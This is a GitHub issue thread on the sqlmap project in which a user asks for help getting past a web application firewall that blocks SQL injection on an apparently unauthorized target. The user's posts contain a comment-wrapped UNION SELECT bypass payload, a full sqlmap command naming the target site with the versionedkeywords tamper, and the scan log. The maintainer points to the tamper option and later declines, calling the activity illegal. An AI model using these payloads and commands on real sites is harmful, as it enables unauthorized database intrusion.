search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
32.71k stars 5.74k forks source link

Filter bypassing #662

Closed italy2010 closed 10 years ago

italy2010 commented 10 years ago

Hello i have one target with mysql sql injection bug. (error-based). but their host seem blocked sql injection attacks. because it give me this error :406 Not Acceptable

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

406 Not Acceptable i checked all tampers but it was not ok. i found one bypass code, but seem it is not available in sqlmap tampers. Here is 2 example for bypassing filters http://www.hcon.in/4/post/2012/04/sql-injection-tutorial-series-part-1.html http://rohann1313.blogspot.com/2013/04/advanced-sql-injection-and-firewall.html is it possible to add this codes in tampers? thanks
stamparm commented 10 years ago

Can you please be more specific? Those two links don't clear what you want On Apr 3, 2014 6:44 AM, "italy2010" notifications@github.com wrote:

Hello i have one target with mysql sql injection bug. (error-based). but their host seem blocked sql injection attacks. because it give me this error :406 Not Acceptable

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

406 Not Acceptable

i checked all tampers but it was not ok. i found one bypass code, but seem it is not available in sqlmap tampers.

Here is 2 example for bypassing filters

http://www.hcon.in/4/post/2012/04/sql-injection-tutorial-series-part-1.html

http://rohann1313.blogspot.com/2013/04/advanced-sql-injection-and-firewall.html

is it possible to add this codes in tampers? thanks

Reply to this email directly or view it on GitHubhttps://github.com/sqlmapproject/sqlmap/issues/662 .

italy2010 commented 10 years ago

hi i talk about this in first link /////////////////////////////////////////

  1. Filter Bypassing
    Generally while doing sql injection, some sql keywords are used like union, select, from etc...the administrator filters these keywords so as to block such requests but it still becomes possible for an attacker to bypass these kind of filters

Example: the attacker attacks like this, index.php?id=1 union all select 1,2,3--n site gives response 406 not acceptable so by using tricks like this index.php?id=1 /!union/ /!all/ !select/ 1,2,3-- the attacker bypasses the security there are many ways to bypass this it depends on how strongly the administrator has created the filter.

/////////////////////////////////////////

i have one user for example = http://x2x.net/form/form.php?joBm=1 when sqlmap trying to test sql parameters website give me back error 406 (see in first link part 4) so http://x2x.net/form/form.php?joBm=1 And 1=1 or order+by and union all select 1,2,3--n ... and tampers not work.

but this code work and i dont see any 406 errors. http://x2x.net/form/form.php?joBm=1 /!union/ /!all/ !select/ 1,2,3-- and this code bypass WAF. seem sqlmap dont have this bypass code in Tampers.because i checked all of them give me back error 406.

if you dont understand me i can give you private link of website. for checkup.

italy2010 commented 10 years ago

ok, i found a better info, in here http://hackersohail.blogspot.com/2014/03/bypass-web-application-firewalls-web.html spoked about "By Replaced Keywords" method to bypass WAF.

my target can bypass with this method.

stamparm commented 10 years ago

--tamper=versionedkeywords

italy2010 commented 10 years ago

seem it is ok with this tamper, but i checked with Level 5 /Risk 3 , and sqlmap dont find a injection.

sqlmap.py -u "http://X2X.COM/form/form.php" --data=" req=2&pid=&send=1" -p pid --dbms mysql --level 5 --risk 3 --dbs --random-agen t --tamper=versionedkeywords --technique E

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon sible for any misuse or damage caused by this program

[*] starting at 12:59:57

[12:59:57] [INFO] loading tamper script 'versionedkeywords' [12:59:57] [WARNING] tamper script 'versionedkeywords' is only meant to be run a gainst MySQL [12:59:57] [INFO] fetched random HTTP User-Agent header from file 'C:\Users\root \txt\user-agents.txt': Opera/9.25 (Windows NT 5.1; U; lt) [12:59:57] [INFO] testing connection to the target URL [12:59:58] [INFO] heuristics detected web page charset 'utf-8' [12:59:58] [WARNING] heuristic (basic) test shows that POST parameter 'pid' migh t not be injectable [12:59:58] [INFO] testing for SQL injection on POST parameter 'pid' [12:59:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause ' [13:00:35] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)' [13:01:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)' [13:01:50] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause ' [13:02:30] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'

[13:03:05] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)' [13:03:39] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)' [13:04:17] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause'

[13:04:46] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause' [13:05:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' [13:05:15] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT VALUE)' [13:05:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX ML)' [13:05:16] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clau ses' [13:05:19] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clau ses (EXTRACTVALUE)' [13:05:20] [INFO] testing 'MySQL >= 5.1 error-based - GROUP BY and ORDER BY clau ses (UPDATEXML)' [13:05:21] [WARNING] POST parameter 'pid' is not injectable [13:05:21] [CRITICAL] all tested parameters appear to be not injectable. Rerun w ithout providing the option '--technique'. Also, you can try to rerun by providi ng either a valid value for option '--string' (or '--regexp')

[*] shutting down at 13:05:21

stamparm commented 10 years ago

You can debug the issue by inspecting the requests and responses inside the traffic file got by -t traffic.txt. When you find what's wrong you can contact back and we'll gladly fix the issue (if it exists)

italy2010 commented 10 years ago

ok. i sent log file to your gmail. thanks

stamparm commented 10 years ago

Can't help you in illegal activities. You can find what's wrong (with those targets you've sent) and report back.